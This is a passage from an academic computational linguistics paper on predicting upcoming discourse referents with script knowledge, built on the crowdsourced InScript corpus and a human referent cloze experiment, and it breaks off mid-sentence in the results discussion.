Scripts represent knowledge about typical event sequences (Schank and Abelson, 1977), for example the sequence of events happening when eating at a restaurant. Script knowledge thereby includes events like order, bring and eat as well as participants of those events, e.g., menu, waiter, food, guest. Existing methods for acquiring script knowledge are based on extracting narrative chains from text (Chambers and Jurafsky, 2008; Chambers and Jurafsky, 2009; Jans et al., 2012; Pichotta and Mooney, 2014; Rudinger et al., 2015; Modi, 2016; Ahrendt and Demberg, 2016) or by eliciting script knowledge via crowdsourcing on Mechanical Turk (Regneri et al., 2010; Frermann et al., 2014; Modi and Titov, 2014).

Modelling anticipated events and participants is motivated by evidence showing that event representations in humans contain information not only about the current event, but also about previous and future states, that is, humans generate anticipations about event sequences during normal language comprehension (Schütz-Bosbach and Prinz, 2007). Script knowledge representations have been shown to be useful in NLP applications for ambiguity resolution during reference resolution (Rahman and Ng, 2012).

2 Data: The InScript Corpus

Ordinary texts, including narratives, encode script structure in a way that is too complex and too implicit at the same time to enable a systematic study of script-based expectation. They contain interleaved references to many different scripts, and they usually refer to single scripts in a point-wise fashion only, relying on the ability of the reader to infer the full event chain using their background knowledge. We use the InScript corpus (Modi et al., 2016) to study the predictive effect of script knowledge. InScript is a crowdsourced corpus of simple narrative texts. Participants were asked to write about a specific activity (e.g., a restaurant visit, a bus ride, or a grocery shopping event) which they personally experienced, and they were instructed to tell the story as if explaining the activity to a child. This resulted in stories that are centered around a specific scenario and that explicitly mention mundane details. Thus, they generally realize longer event chains associated with a single script, which makes them particularly appropriate to our purpose.

The InScript corpus is labelled with event-type, participant-type, and coreference information. Full verbs are labeled with event type information, heads of all noun phrases with participant types, using scenario-specific lists of event types (such as enter bathroom, close drain and fill water for the "taking a bath" scenario) and participant types (such as bather, water and bathtub). On average, each template offers a choice of 20 event types and 18 participant types.
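To make the annotation layers concrete, the labels from the Figure 1 excerpt can be held in a small in-memory structure like the one below. The record layout is only an illustrative assumption and not the corpus' actual release format.

# Illustrative view of the InScript labels for the opening of the Figure 1 story;
# the dictionary layout is an assumption, not the corpus' actual file format.
story = {
    "scenario": "taking a bath",
    "mentions": [   # referring expressions with discourse referent id and participant type
        {"text": "I",        "dr": 1, "participant": "bather"},
        {"text": "bath",     "dr": 2, "participant": "bath"},
        {"text": "bathroom", "dr": 3, "participant": "bathroom"},
    ],
    "events": [     # script-relevant verbs with their event types
        {"text": "decided", "event": "wash"},
        {"text": "walked",  "event": "enter_bathroom"},
    ],
}

# Coreference chains fall out of the shared discourse referent ids:
chains = {}
for mention in story["mentions"]:
    chains.setdefault(mention["dr"], []).append(mention["text"])
print(chains)   # {1: ['I'], 2: ['bath'], 3: ['bathroom']}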
(I)(1) decided to take a (bath)(2) yesterday afternoon after working out . Once (I)(1) got back home , (I)(1) walked to (my)(1) (bathroom)(3) and first quickly scrubbed the (bathroom tub)(4) by turning on the (water)(5) and rinsing (it)(4) clean with a rag . After (I)(1) finished , (I)(1) plugged XXXXXX

Figure 2: An illustration of the Mechanical Turk experiment for the referent cloze task. Workers are supposed to guess the upcoming referent (indicated by XXXXXX above). They can either choose from the previously activated referents, or they can write something new.

Figure 3: Response of workers corresponding to the story in Fig. 2 (number of workers per option: 14 for DR_4 (P_bathtub), 5 for a new DR "the drain", 1 for DR_1 (P_bather)). Workers guessed two already activated discourse referents (DR), DR_4 and DR_1. Some of the workers also chose the "new" option and wrote different lexical variants of "bathtub drain", a new DR corresponding to the participant type "the drain".

The InScript corpus consists of 910 stories addressing 10 scenarios (about 90 stories per scenario). The corpus has 200,000 words, 12,000 verb instances with event labels, and 44,000 head nouns with participant instances. Modi et al. (2016) report an inter-annotator agreement of 0.64 for event types and 0.77 for participant types (Fleiss' kappa). We use gold-standard event- and participant-type annotation to study the influence of script knowledge on the expectation of discourse referents. In addition, InScript provides coreference annotation, which makes it possible to keep track of the mentioned discourse referents at each point in the story. We use this information in the computational model of DR prediction and in the DR guessing experiment described in the next section. An example of an annotated InScript story is shown in Figure 1.

3 Referent Cloze Task

We use the InScript corpus to develop computational models for the prediction of discourse referents (DRs) and to evaluate their prediction accuracy. This can be done by testing how often our models manage to reproduce the original discourse referent (cf. also the "narrative cloze" task by Chambers and Jurafsky (2008), which tests whether a verb together with a role can be correctly guessed by a model). However, we do not only want to predict the "correct" DRs in a text but also to model human expectation of DRs in context. To empirically assess human expectation, we created an additional database of crowdsourced human predictions of discourse referents in context using Amazon Mechanical Turk. The design of our experiment closely resembles the guessing game of Tily and Piantadosi (2009) but extends it in a substantial way.

Workers had to read stories of the InScript corpus (1) and guess upcoming participants: for each target NP, workers were shown the story up to this NP excluding the NP itself, and they were asked to guess the next person or object most likely to be referred to. In case they decided in favour of a discourse referent already mentioned, they had to choose among the available discourse referents by clicking an NP in the preceding text, i.e., some noun with a specific, coreference-indicating color; see Figure 2. Otherwise, they would click the "New" button, and would in turn be asked to give a short description of the new person or object they expected to be mentioned. The percentage of guesses that agree with the actually referred entity was taken as a basis for estimating the surprisal. The experiment was done for all stories of the test set: 182 stories (20%) of the InScript corpus, evenly taken from all scenarios. Since our focus is on the effect of script knowledge, we only considered those NPs as targets that are direct dependents of script-related events. Guessing started from the third sentence only in order to ensure that a minimum of context information was available. To keep the complexity of the context manageable, we restricted guessing to a maximum of 30 targets and skipped the rest of the story (this applied to 12% of the stories). We collected 20 guesses per NP for 3346 noun phrase instances, which amounts to a total of around 67K guesses. Workers selected a context NP in 68% of cases and "New" in 32% of cases.

(1) The corpus is available at: http://www.sfb1102.uni-saarland.de/?page_id=2582
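The paper states only that the share of matching guesses is the basis of the surprisal estimate. As a hedged illustration, the sketch below turns the 20 guesses collected for one target NP into such an estimate, using add-one smoothing over the candidate set as one simple (assumed) choice; the counts are those reported for the example in Figures 2 and 3.

import math

def referent_surprisal(guess_counts, gold_dr, n_candidates):
    # Empirical probability of the discourse referent that actually occurs,
    # smoothed with add-one over the candidate set (an assumption; the paper
    # does not spell out its exact estimator), converted to surprisal in bits.
    total = sum(guess_counts.values())
    p = (guess_counts.get(gold_dr, 0) + 1) / (total + n_candidates)
    return -math.log2(p)

# 14 of the 20 workers guessed DR_4, 5 proposed a new "drain" referent and
# 1 guessed DR_1 (the distribution reported for the Figure 2/3 example):
guesses = {"DR_4": 14, "new:drain": 5, "DR_1": 1}
print(referent_surprisal(guesses, "DR_4", n_candidates=10))   # = 1.0 bit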
Since our focus is on the effect of script knowledge, we only considered those NPs as targets that are direct dependents of script-related events. Guessing started from the third sentence only in order to ensure that a minimum of context information was available. To keep the complexity of the context manageable, we restricted guessing to a maximum of 30 targets and skipped the rest of the story (this applied to 12% of the stories). We collected 20 guesses per NP for 3346 noun phrase instances, which amounts to a total of around 67K guesses. Workers selected a context NP in 68% of cases and “New” in 32% of cases.

¹The corpus is available at: http://www.sfb1102.uni-saarland.de/?page_id=2582

Our leading hypothesis is that script knowledge substantially influences human expectation of discourse referents. The guessing experiment provides a basis to estimate human expectation of already mentioned DRs (the number of clicks on the respective NPs in text). However, we expect that script knowledge has a particularly strong influence in the case of first mentions. Once a script is evoked in a text, we assume that the full script structure, including all participants, is activated and available to the reader.

Tily and Piantadosi (2009) are interested in second mentions only and therefore do not make use of the worker-generated noun phrases classified as “New”. To study the effect of activated but not explicitly mentioned participants, we carried out a subsequent annotation step on the worker-generated noun phrases classified as “New”. We presented annotators with these noun phrases in their contexts (with co-referring NPs marked by color, as in the M-Turk experiment) and, in addition, displayed all participant types of the relevant script (i.e., the script associated with the text in the InScript corpus). Annotators did not see the “correct” target NP. We asked annotators to either (1) select the participant type instantiated by the NP (if any), (2) label the NP as unrelated to the script, or (3) link the NP to an overt antecedent in the text, in the case that the NP is actually a second mention that had been erroneously labeled as new by the worker. Option (1) provides a basis for a fine-grained estimation of first-mention DRs. Option (3), which we added when we noticed the considerable number of overlooked antecedents, serves as correction of the results of the M-Turk experiment. Out of the 22K annotated “New” cases, 39% were identified as second mentions, 55% were linked to a participant type, and 6% were classified as really novel.

4 Referent Prediction Model

In this section, we describe the model we use to predict upcoming discourse referents (DRs).

4.1 Model

Our model should not only assign probabilities to DRs already explicitly introduced in the preceding text fragment (e.g., “bath” or “bathroom” for the cloze task in Figure 2) but also reserve some probability mass for ‘new’ DRs, i.e., DRs activated via the script context or completely novel ones not belonging to the script. In principle, different variants of the activation mechanism must be distinguished. For many participant types, a single participant belonging to a specific semantic class is expected (referred to with the bathtub or the soap). In contrast, the “towel” participant type may activate a set of objects, elements of which then can be referred to with a towel or another towel.
The “bath means” participant type may even activate a group of DRs belonging to different semantic classes (e.g., bubble bath and salts). Since it is not feasible to enumerate all potential participants, for ‘new’ DRs we only predict their participant type (“bath means” in our example). In other words, the number of categories in our model is equal to the number of previously introduced DRs plus the number of participant types of the script plus 1, reserved for a new DR not corresponding to any script participant (e.g., cellphone). In what follows, we slightly abuse the terminology and refer to all these categories as discourse referents.

Unlike standard co-reference models, which predict co-reference chains relying on the entire document, our model is incremental, that is, when predicting a discourse referent d^{(t)} at a given position t, it can look only in the history h^{(t)} (i.e., the preceding part of the document), excluding the referring expression (RE) for the predicted DR. We also assume that past REs are correctly resolved and assigned to correct participant types (PTs). Typical NLP applications use automatic coreference resolution systems, but since we want to model human behavior, this might be inappropriate, since an automated system would underestimate human performance. This may be a strong assumption, but for reasons explained above, we use gold standard past REs.

We use the following log-linear model (“softmax regression”):

p(d^{(t)} = d \mid h^{(t)}) = \frac{\exp(\mathbf{w}^\top \mathbf{f}(d, h^{(t)}))}{\sum_{d'} \exp(\mathbf{w}^\top \mathbf{f}(d', h^{(t)}))},

where f is the feature function we will discuss in the following subsection, w are model parameters, and the summation in the denominator is over the set of categories described above.

Some of the features included in f are a function of the predicate syntactically governing the unobservable target RE (corresponding to the DR being predicted). However, in our incremental setting, the predicate is not available in the history h^{(t)} for subject NPs. In this case, we use an additional probabilistic model, which estimates the probability of the predicate v given the context h^{(t)}, and marginalize out its predictions:

p(d^{(t)} = d \mid h^{(t)}) = \sum_{v} p(v \mid h^{(t)}) \frac{\exp(\mathbf{w}^\top \mathbf{f}(d, h^{(t)}, v))}{\sum_{d'} \exp(\mathbf{w}^\top \mathbf{f}(d', h^{(t)}, v))}

The predicate probabilities p(v | h^{(t)}) are computed based on the sequence of preceding predicates (i.e., ignoring any other words) using the recurrent neural network language model estimated on our training set.² The expression f(d, h^{(t)}, v) denotes the feature function computed for the referent d, given the history composed of h^{(t)} and the predicate v.

²We used the RNNLM toolkit (Mikolov et al., 2011; Mikolov et al., 2010) with default settings.

Table 1: Summary of feature types

  Feature                    Type
  Recency                    Shallow Linguistic
  Frequency                  Shallow Linguistic
  Grammatical function       Shallow Linguistic
  Previous subject           Shallow Linguistic
  Previous object            Shallow Linguistic
  Previous RE type           Shallow Linguistic
  Selectional preferences    Linguistic
  Participant type fit       Script
  Predicate schemas          Script

4.2 Features

Our features encode properties of a DR as well as characterize its compatibility with the context. We face two challenges when designing our features. First, although the sizes of our datasets are respectable from the script annotation perspective, they are too small to learn a richly parameterized model. For many of our features, we address this challenge by using external word embeddings³ and associate parameters with some simple similarity measures computed using these embeddings. Consequently, there are only a few dozen parameters which need to be estimated from scenario-specific data. Second, in order to test our hypothesis that script information is beneficial for the DR prediction task, we need to disentangle the influence of script information from general linguistic knowledge. We address this by carefully splitting the features apart, even if it prevents us from modeling some interplay between the sources of information. We will describe both classes of features below; also see a summary in Table 1.

³We use 300-dimensional word embeddings estimated on Wikipedia with the skip-gram model of Mikolov et al. (2013): https://code.google.com/p/word2vec/

4.2.1 Shallow Linguistic Features

These features are based on Tily and Piantadosi (2009). In addition, we consider a selectional preference feature.

Recency feature. This feature captures the distance l_t(d) between the position t and the last occurrence of the candidate DR d. As a distance measure, we use the number of sentences from the last mention and exponentiate this number to make the dependence more extreme; only very recent DRs will receive a noticeable weight: \exp(-l_t(d)). This feature is set to 0 for new DRs.

Frequency. The frequency feature indicates the number of times the candidate discourse referent d has been mentioned so far. We do not perform any bucketing.

Grammatical function. This feature encodes the dependency relation assigned to the head word of the last mention of the DR or a special none label if the DR is new.

Previous subject indicator. This binary feature indicates whether the candidate DR d is coreferential with the subject of the previous verbal predicate.

Previous object indicator. The same but for the object position.

Previous RE type. This three-valued feature indicates whether the previous mention of the candidate DR d is a pronoun, a non-pronominal noun phrase, or has never been observed before.

4.2.2 Selectional Preferences Feature

The selectional preference feature captures how well the candidate DR d fits a given syntactic position r of a given verbal predicate v. It is computed as the cosine similarity \mathrm{sim}_{\cos}(x_d, x_{v,r}) of a vector-space representation of the DR, x_d, and a structured vector-space representation of the predicate, x_{v,r}. The similarities are calculated using a Distributional Memory approach similar to that of Baroni and Lenci (2010). Their structured vector space representation has been shown to work well on tasks that evaluate correlation with human thematic fit estimates (Baroni and Lenci, 2010; Baroni et al., 2014; Sayeed et al., 2016) and is thus suited to our task.

The representation x_d is computed as an average of head word representations of all the previous mentions of DR d, where the word vectors are obtained from the TypeDM model of Baroni and Lenci (2010). This is a count-based, third-order co-occurrence tensor whose indices are a word w_0, a second word w_1, and a complex syntactic relation r, which is used as a stand-in for a semantic link. The values for each (w_0, r, w_1) cell of the tensor are the local mutual information (LMI) estimates obtained from a dependency-parsed combination of large corpora (ukWaC, BNC, and Wikipedia). Our procedure has some differences with that of Baroni and Lenci.
For example, for estimating the fit of an alternative new DR (in other words, x_d based on no previous mentions), we use an average over head words of all REs in the training set, a “null referent.” x_{v,r} is calculated as the average of the top 20 (by LMI) r-fillers for v in TypeDM; in other words, the prototypical instrument of rub may be represented by summing vectors like towel, soap, eraser, coin, and so on. If the predicate has not yet been encountered (as for subject positions), scores for all scenario-relevant verbs are emitted for marginalization.

4.2.3 Script Features

In this section, we describe features which rely on script information. Our goal will be to show that such common-sense information is beneficial in performing DR prediction. We consider only two script features.

Participant type fit

This feature characterizes how well the participant type (PT) of the candidate DR d fits a specific syntactic role r of the governing predicate v; it can be regarded as a generalization of the selectional preference feature to participant types and also its specialisation to the considered scenario. Given the candidate DR d, its participant type p, and the syntactic relation r, we collect all the predicates in the training set which have the participant type p in the position r. The embedding of the DR x_{p,r} is given by the average embedding of these predicates. The feature is computed as the dot product of x_{p,r} and the word embedding of the predicate v.

[Figure 4: An example of the referent cloze task. Similar to the Mechanical Turk experiment (Figure 2), our referent prediction model is asked to guess the upcoming DR. Story: “(I)(1) decided to take a (bath)(2) yesterday afternoon after working out. (I)(1) was getting ready to go out and needed to get cleaned before (I)(1) went so (I)(1) decided to take a (bath)(2). (I)(1) filled the (bathtub)(3) with warm (water)(4) and added some (bubble bath)(5). (I)(1) got undressed and stepped into the (water)(4). (I)(1) grabbed the (soap)(5) and rubbed it on (my)(1) (body)(7) and rinsed XXXXXX”]

Predicate schemas

The following feature captures a specific aspect of knowledge about prototypical sequences of events. This knowledge is called predicate schemas in the recent co-reference modeling work of Peng et al. (2015). In predicate schemas, the goal is to model pairs of events such that if a DR d participated in the first event (in a specific role), it is likely to participate in the second event (again, in a specific role). For example, in the restaurant scenario, if one observes a phrase John ordered, one is likely to see John waited somewhere later in the document. Specific arguments are not that important (whether it is John or some other DR); what is important is that the argument is reused across the predicates. This would correspond to the rule X-subject-of-order → X-subject-of-eat.⁴ Unlike the previous work, our dataset is small, so we cannot induce these rules directly as there will be very few rules, and the model would not generalize to new data well enough. Instead, we again encode this intuition using similarities in the real-valued embedding space.

⁴In this work, we limit ourselves to rules where the syntactic function is the same on both sides of the rule. In other words, we can, in principle, encode the pattern X pushed Y → X apologized but not the pattern X pushed Y → Y cried.

Table 2: Summary of model features

  Model       Feature types                                                      Features
  Base        Shallow Linguistic Features                                        Recency, Frequency, Grammatical function, Previous subject, Previous object
  Linguistic  Shallow Linguistic Features + Linguistic Feature                   Recency, Frequency, Grammatical function, Previous subject, Previous object + Selectional Preferences
  Script      Shallow Linguistic Features + Linguistic Feature + Script Features Recency, Frequency, Grammatical function, Previous subject, Previous object + Selectional Preferences + Participant type fit, Predicate schemas

Recall that our goal is to compute a feature φ(d, h^{(t)}) indicating how likely a potential DR d is to follow, given the history h^{(t)}. For example, imagine that the model is asked to predict the DR marked by XXXXXX in Figure 4. Predicate-schema rules can only yield previously introduced DRs, so the score φ(d, h^{(t)}) = 0 for any new DR d. Let us use “soap” as an example of a previously introduced DR and see how the feature is computed. In order to choose which inference rules can be applied to yield “soap”, we can inspect Figure 4. There are only two preceding predicates which have DR “soap” as their object (rubbed and grabbed), resulting in two potential rules X-object-of-grabbed → X-object-of-rinsed and X-object-of-rubbed → X-object-of-rinsed. We define the score φ(d, h^{(t)}) as the average of the rule scores. More formally, we can write

\phi(d, h^{(t)}) = \frac{1}{|N(d, h^{(t)})|} \sum_{(u,v,r) \in N(d, h^{(t)})} \psi(u, v, r),   (1)

where ψ(u, v, r) is the score for a rule X-r-of-u → X-r-of-v, N(d, h^{(t)}) is the set of applicable rules, and |N(d, h^{(t)})| denotes its cardinality.⁵ We define φ(d, h^{(t)}) as 0 when the set of applicable rules is empty (i.e. |N(d, h^{(t)})| = 0).

⁵In all our experiments, rather than considering all potential predicates in the history to instantiate rules, we take into account only 2 preceding verbs. In other words, u and v can be interleaved by at most one verb and |N(d, h^{(t)})| is in {0, 1, 2}.

We define the scoring function ψ(u, v, r) as a linear function of a joint embedding x_{u,v} of verbs u and v: \psi(u, v, r) = \alpha_r^\top x_{u,v}. The two remaining questions are (1) how to define the joint embeddings x_{u,v}, and (2) how to estimate the parameter vector α_r. The joint embedding of two predicates, x_{u,v}, can, in principle, be any composition function of embeddings of u and v, for example their sum or component-wise product. Inspired by Bordes et al. (2013), we use the difference between the word embeddings:

\psi(u, v, r) = \alpha_r^\top (x_u - x_v),

where x_u and x_v are external embeddings of the corresponding verbs. Encoding the succession relation as translation in the embedding space has one desirable property: the scoring function will be largely agnostic to the morphological form of the predicates. For example, the difference between the embeddings of rinsed and rubbed is very similar to that of rinse and rub (Botha and Blunsom, 2014), so the corresponding rules will receive similar scores. Now, we can rewrite equation (1) as

\phi(d, h^{(t)}) = \alpha_{r(h^{(t)})}^\top \frac{\sum_{(u,v,r) \in N(d, h^{(t)})} (x_u - x_v)}{|N(d, h^{(t)})|}   (2)

where r(h^{(t)}) denotes the syntactic function corresponding to the DR being predicted (object in our example). As for the parameter vector α_r, there are again a number of potential ways how it can be estimated. For example, one can train a discriminative classifier to estimate the parameters.
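The following sketch (in Python, with made-up toy embeddings standing in for the external word2vec vectors) illustrates how the predicate-schema score of equations (1)–(2) could be computed for the “soap” example: each applicable rule contributes α_r·(x_u − x_v), and the scores are averaged. The vector values and variable names are illustrative assumptions; how α_r itself is obtained is addressed next.

```python
import numpy as np

def predicate_schema_feature(alpha_r, rules, emb):
    """phi(d, h) for one candidate DR: the average rule score
    psi(u, v, r) = alpha_r . (x_u - x_v) over the applicable rules
    N(d, h), i.e. pairs (u, v) where a preceding predicate u had the
    candidate DR in role r and v is the upcoming predicate.
    Returns 0 when no rule applies (e.g. for new DRs)."""
    if not rules:
        return 0.0
    scores = [alpha_r @ (emb[u] - emb[v]) for u, v in rules]
    return float(np.mean(scores))

# Toy 4-dimensional "embeddings" (values invented for illustration).
emb = {
    "grabbed": np.array([0.9, 0.1, 0.0, 0.2]),
    "rubbed":  np.array([0.8, 0.2, 0.1, 0.1]),
    "rinsed":  np.array([0.7, 0.3, 0.1, 0.0]),
}
alpha_obj = np.array([0.5, -0.2, 0.1, 0.3])   # assumed; its estimation is discussed below

# Rules applicable to the DR "soap" in the Figure 4 example:
# X-object-of-grabbed -> X-object-of-rinsed and
# X-object-of-rubbed  -> X-object-of-rinsed.
rules_soap = [("grabbed", "rinsed"), ("rubbed", "rinsed")]
print(predicate_schema_feature(alpha_obj, rules_soap, emb))
```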
However, we opted for a simpler approach—we set it equal to the empirical estimate of the expected feature vector x_{u,v} on the training set:⁶

\alpha_r = \frac{1}{D_r} \sum_{l,t} \delta_r(r(h^{(l,t)})) \sum_{(u,v,r') \in N(d^{(l,t)}, h^{(l,t)})} (x_u - x_v),   (3)

where l refers to a document in the training set, t is (as before) a position in the document, h^{(l,t)} and d^{(l,t)} are the history and the correct DR for this position, respectively. The term δ_r(r') is the Kronecker delta which equals 1 if r = r' and 0 otherwise. D_r is the total number of rules for the syntactic function r in the training set:

D_r = \sum_{l,t} \delta_r(r(h^{(l,t)})) \times |N(d^{(l,t)}, h^{(l,t)})|.

⁶This essentially corresponds to using the Naive Bayes model with the simplistic assumption that the score differences are normally distributed with spherical covariance matrices.

Table 3: Accuracies (in %) and perplexities for different models and scenarios. The script model substantially outperforms linguistic and base models (with p < 0.001, significance tested with McNemar’s test (Everitt, 1992)). As expected, the human prediction model outperforms the script model (with p < 0.001, significance tested by McNemar’s test).

  Scenario                        Human Model         Script Model        Linguistic Model    Tily Model
                                  Accuracy  Perplex.  Accuracy  Perplex.  Accuracy  Perplex.  Accuracy  Perplex.
  Grocery Shopping                74.80     2.13      68.17     3.16      53.85     6.54      32.89     24.48
  Repairing a flat bicycle tyre   78.34     2.72      62.09     3.89      51.26     6.38      29.24     19.08
  Riding a public bus             72.19     2.28      64.57     3.67      52.65     6.34      32.78     23.39
  Getting a haircut               71.06     2.45      58.82     3.79      42.82     7.11      28.70     15.40
  Planting a tree                 71.86     2.46      59.32     4.25      47.80     7.31      28.14     24.28
  Borrowing book from library     77.49     1.93      64.07     3.55      43.29     8.40      33.33     20.26
  Taking Bath                     81.29     1.84      67.42     3.14      61.29     4.33      43.23     16.33
  Going on a train                70.79     2.39      58.73     4.20      47.62     7.68      30.16     35.11
  Baking a cake                   76.43     2.16      61.79     5.11      46.40     9.16      24.07     23.67
  Flying in an airplane           62.04     3.08      61.31     4.01      48.18     7.27      30.90     30.18
  Average                         73.63     2.34      62.63     3.88      49.52     7.05      31.34     23.22

Table 4: Accuracies from ablation experiments.

  Model                                     Accuracy  Perplexity
  Linguistic Model                          49.52     7.05
  Linguistic Model + Predicate Schemas      55.44     5.88
  Linguistic Model + Participant type fit   58.88     4.29
  Full Script Model (both features)         62.63     3.88

Let us illustrate the computation with an example. Imagine that our training set consists of the document in Figure 1, and the trained model is used to predict the upcoming DR in our referent cloze example (Figure 4). The training document includes the pair X-object-of-scrubbed → X-object-of-rinsing, so the corresponding term (x_scrubbed − x_rinsing) participates in the summation (3) for α_obj. As we rely on external embeddings, which encode semantic similarities between lexical items, the dot product of this term and (x_rubbed − x_rinsed) will be high.⁷ Consequently, φ(d, h^{(t)}) is expected to be positive for d = “soap”, thus predicting “soap” as the likely forthcoming DR. Unfortunately, there are other terms (x_u − x_v) both in expression (3) for α_obj and in expression (2) for φ(d, h^{(t)}). These terms may be
This may suggest that our feature will be too contaminated with noise to be informative for making predictions. However, recall that inde- pendent random vectors in high dimensions are al- most orthogonal, and, assuming they are bounded, their dot products are close to zero. Consequently, the products of the relevant (“non-random”) terms, in our example (xscrubbed - xrinsing) and (xrubbed - xrinsed), are likely to overcome the (“random”) noise. As we will see in the ablation studies, the predicate- schema feature is indeed predictive of a DR and con- tributes to the performance of the full model. 4.3 Experiments We would like to test whether our model can pro- duce accurate predictions and whether the model’s guesses correlate well with human predictions for the referent cloze task. In order to be able to evaluate the effect of script knowledge on referent predictability, we compare three models: our full Script model uses all of the features introduced in section 4.2; the Linguistic model relies only on the ‘linguistic features’ but not the script-specific ones; and the Base model includes all the shallow linguistic features. The Base model differs from the linguistic model in that it does not model selectional preferences. Table 2 summarizes features used in different models. The data set was randomly divided into training (70%), development (10%, 91 stories from 10 sce- 39 narios), and test (20%, 182 stories from 10 scenar- ios) sets. The feature weights were learned using L-BFGS (Byrd et al., 1995) to optimize the log- likelihood. Evaluation against original referents. We calcu- lated the percentage of correct DR predictions. See Table 3 for the averages across 10 scenarios. We can see that the task appears hard for humans: their average performance reaches only 73% accuracy. As expected, the Base model is the weakest system (the accuracy of 31%). Modeling selectional pref- erences yields an extra 18% in accuracy (Linguis- tic model). The key finding is that incorporation of script knowledge increases the accuracy by further 13%, although still far behind human performance (62% vs. 73%). Besides accuracy, we use perplex- ity, which we computed not only for all our models but also for human predictions. This was possible as each task was solved by multiple humans. We used unsmoothed normalized guess frequencies as the probabilities. As we can see from Table 3, the perplexity scores are consistent with the accuracies: the script model again outperforms other methods, and, as expected, all the models are weaker than hu- mans. As we used two sets of script features, capturing different aspects of script knowledge, we performed extra ablation studies (Table 4). The experiments confirm that both feature sets were beneficial. Evaluation against human expectations. In the previous subsection, we demonstrated that the in- corporation of selectional preferences and, perhaps more interestingly, the integration of automatically acquired script knowledge lead to improved accu- racy in predicting discourse referents. Now we turn to another question raised in the introduction: does incorporation of this knowledge make our predic- tions more human-like? In other words, are we able to accurately estimate human expectations? This in- cludes not only being sufficiently accurate but also making the same kind of incorrect predictions. In this evaluation, we therefore use human guesses collected during the referent cloze task as our target. 
We then calculate the relative accuracy of each computational model. As can be seen in Figure 5, the Script model, at approx. 53% accuracy, is a lot more accurate in predicting human guesses than the Linguistic model and the Base model.

[Figure 5: Average relative accuracies of different models w.r.t. human predictions (Script: 52.9%, Linguistic: 38.4%, Base: 34.52%).]

[Figure 6: Average Jensen-Shannon divergence between human predictions and models (Script: 0.5, Linguistic: 0.57, Base: 0.66).]

We can also observe that the margin between the Script model and the Linguistic model is a lot larger in this evaluation than between the Base model and the Linguistic model. This indicates that the model which has access to script knowledge is much more similar to human prediction behavior in terms of top guesses than the script-agnostic models.

Now we would like to assess if our predictions are similar as distributions rather than only yielding similar top predictions. In order to compare the distributions, we use the Jensen-Shannon divergence (JSD), a symmetrized version of the Kullback-Leibler divergence. Intuitively, JSD measures the distance between two probability distributions. A smaller JSD value is indicative of more similar distributions. Figure 6 shows that the probability distributions resulting from the Script model are more similar to human predictions than those of the Linguistic and Base models.

In these experiments, we have shown that script knowledge improves predictions of upcoming referents and that the script model is the best among our models in approximating human referent predictions.

5 Referring Expression Type Prediction Model (RE Model)

Using the referent prediction models, we next attempt to replicate Tily and Piantadosi’s findings that
Here we focus on the distinction be- tween pronouns and full noun phrases. Our data also contains a small percentage (ca. 1%) of proper names (like “John”). Due to this small class size and earlier findings that proper nouns behave much like pronouns (Tily and Piantadosi, 2009), we com- bined pronouns and proper names into a single class of short encodings. For the referring expression type prediction task, we estimate the surprisal of the referent from each of our computational models from Section 4 as well as the human cloze task. The surprisal of an upcoming discourse referent d(t) based on the previous context h(t) is thereby estimated as: S(d(t)) = − log p(d(t) | h(t)) In order to determine whether referent predictability has an effect on referring expression type over and above other factors that are known to affect the choice of referring expression, we train a logistic regression model with referring expression type as a response variable and discourse referent predictabil- ity as well as a large set of other linguistic factors (based on Tily and Piantadosi, 2009) as explanatory variables. The model is defined as follows: p(n(t) = n|d(t),h(t)) = exp(v T g(n,dt,h(t)))∑ n′ exp(v T g(n′,dt,h(t))) , where d(t) and h(t) are defined as before, g is the feature function, and v is the vector of model pa- rameters. The summation in the denominator is over NP types (full NP vs. pronoun/proper noun). 5.3 RE Model Experiments We ran four different logistic regression models. These models all contained exactly the same set of linguistic predictors but differed in the estimates used for referent type surprisal and residual entropy. One logistic regression model used surprisal esti- mates based on the human referent cloze task, while the three other models used estimates based on the three computational models (Base, Linguistic and Script). For our experiment, we are interested in the choice of referring expression type for those occur- rences of references, where a “real choice” is possi- ble. We therefore exclude for our analysis reported below all first mentions as well as all first and second person pronouns (because there is no optionality in how to refer to first or second person). This subset contains 1345 data points. 5.4 Results The results of all four logistic regression models are shown in Table 5. We first take a look at the results for the linguistic features. While there is a bit of variability in terms of the exact coefficient es- timates between the models (this is simply due to small correlations between these predictors and the predictors for surprisal), the effect of all of these features is largely consistent across models. For in- stance, the positive coefficients for the recency fea- ture means that when a previous mention happened 41 Estimate Std. Error Pr(>| z |) Human Script Linguistic Base Human Script Linguistic Base Human Script Linguistic Base (Intercept) -3.4 -3.418 -3.245 -3.061 0.244 0.279 0.321 0.791 <2e-16 *** <2e-16 *** <2e-16 *** 0.00011 *** recency 1.322 1.322 1.324 1.322 0.095 0.095 0.096 0.097 <2e-16 *** <2e-16 *** <2e-16 *** <2e-16 *** frequency 0.097 0.103 0.112 0.114 0.098 0.097 0.098 0.102 0.317 0.289 0.251 0.262 pastObj 0.407 0.396 0.423 0.395 0.293 0.294 0.295 0.3 0.165 0.178 0.151 0.189 pastSubj -0.967 -0.973 -0.909 -0.926 0.559 0.564 0.562 0.565 0.0838 . 0.0846 . 
0.106 0.101 pastExpPronoun 1.603 1.619 1.616 1.602 0.21 0.207 0.208 0.245 2.19e-14 *** 5.48e-15 *** 7.59e-15 *** 6.11e-11 *** depTypeSubj 2.939 2.942 2.656 2.417 0.299 0.347 0.429 1.113 <2e-16 *** <2e-16 *** 5.68e-10 *** 0.02994 * depTypeObj 1.199 1.227 0.977 0.705 0.248 0.306 0.389 1.109 1.35e-06 *** 6.05e-05 *** 0.0119 * 0.525 surprisal -0.04 -0.006 0.002 -0.131 0.099 0.097 0.117 0.387 0.684 0.951 0.988 0.735 residualEntropy -0.009 0.023 -0.141 -0.128 0.088 0.128 0.168 0.258 0.916 0.859 0.401 0.619 Table 5: Coefficients obtained from regression analysis for different models. Two NP types considered: full NP and Pronoun/ProperNoun, with base class full NP. Significance: ‘***’ < 0.001, ‘**’ < 0.01, ‘*’ < 0.05, and ‘.’ < 0.1. very recently, the referring expression is more likely to be a pronoun (and not a full NP). The coefficients for the surprisal estimates of the different models are, however, not significantly dif- ferent from zero. Model comparison shows that they do not improve model fit. We also used the esti- mated models to predict referring expression type on new data and again found that surprisal estimates from the models did not improve prediction accu- racy. This effect even holds for our human cloze data. Hence, it cannot be interpreted as a problem with the models—even human predictability esti- mates are, for this dataset, not predictive of referring expression type. We also calculated regression models for the full dataset including first and second person pronouns as well as first mentions (3346 data points). The re- sults for the full dataset are fully consistent with the findings shown in Table 5: there was no significant effect of surprisal on referring expression type. This result contrasts with the findings by Tily and Piantadosi (2009), who reported a 